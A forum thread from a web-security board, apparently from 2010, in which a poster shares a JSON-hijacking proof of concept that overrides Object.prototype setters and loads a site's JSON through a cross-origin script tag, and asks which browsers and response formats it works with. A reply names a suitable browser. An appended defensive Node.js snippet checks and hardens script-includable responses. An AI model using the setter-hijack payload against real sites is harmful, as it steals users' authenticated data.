Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixations, hijacking, lockout, replay, session riding, etc.
JSON help
Posted by: zatoichi
Date: May 17, 2010 12:40AM

Hi,

A web application is sending data in this format:

{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}

and I am using this code to get the JSON from my web site:

<script>
Object.prototype.__defineSetter__("t",function(obj){alert(1);for(var i in obj) {alert(i + '=' + obj);} });
</script>
<script defer="defer" src="http://XXX.XXX.XXX.X/main"/> // this points to the json
</script>

Is there anything wrong with the code or the format of the JSON? I am using the following browsers to write the PoC:

1. Firefox 3.6.3
2. IE 7.0.5730.13

Do these browsers allow setters/getters? Please suggest a browser for running the PoC.

Re: JSON help
Posted by: Gareth Heyes
Date: May 17, 2010 07:22AM

IE doesn't have __defineSetter__ support, and FF3 disabled define setter on the object prototype. Try it in Google Chrome; it should work.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSON help
Posted by: zatoichi
Date: May 18, 2010 02:01AM

@Gareth Heyes: thanks for the tip.

I am not able to capture this kind of JSON:

Format 1:

{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}

but if I convert it to:

Format 2:

[{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}]

I am able to capture the event in the setter function.

Is there any way to capture the event when the JSON is in the previous format (Format 1)?

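Added example (not part of any post in this thread): a server-side check, written for Node.js, of which JSON response bodies would even parse as JavaScript when pulled in through a cross-origin `<script src>`. It runs the thread's two formats, showing that a top-level object (Format 1) is a syntax error as a script while a top-level array (Format 2) is not; the `GUARD` prefix and the `data` wrapper key are assumptions of this example.

```javascript
// Constructed samples: the two response formats quoted in the thread.
const FORMAT_1 = '{"t":1,"p":1,"r":1,"rows":[{"i":0,"c":["n","H, C","A","5","T","n"]}]}';
const FORMAT_2 = "[" + FORMAT_1 + "]";

// Assumption: an unparseable prefix the legitimate client strips before JSON.parse.
const GUARD = ")]}',\n";

// True if `body` compiles as JavaScript. new Function() only parses the text;
// the resulting function is never called, so nothing in `body` runs.
// (A function body is a close approximation of a classic script for JSON input.)
function parsesAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Report how a response body behaves when pulled in via <script src>.
function audit(body) {
  const guarded = body.startsWith(GUARD);
  const value = JSON.parse(guarded ? body.slice(GUARD.length) : body);
  const topLevel = Array.isArray(value) ? "array"
    : value !== null && typeof value === "object" ? "object" : "primitive";
  const includable = parsesAsScript(body);
  // Only an includable array/object literal gets evaluated as data by the script engine.
  return { topLevel, guarded, includable, atRisk: includable && topLevel !== "primitive" };
}

// Server-side hardening: never emit a bare top-level array.
// The wrapper key "data" is a hypothetical name chosen for this example.
function harden(body) {
  return audit(body).atRisk ? JSON.stringify({ data: JSON.parse(body) }) : body;
}

for (const [name, body] of [["Format 1", FORMAT_1], ["Format 2", FORMAT_2],
    ["Format 2 wrapped", harden(FORMAT_2)], ["Format 2 guarded", GUARD + FORMAT_2]]) {
  console.log(name, audit(body));
}
```

An endpoint whose audit reports `atRisk: true` should be changed to return an object at the top level or to send the guard prefix, and sensitive JSON should in any case not be served on cookie-authenticated GET requests.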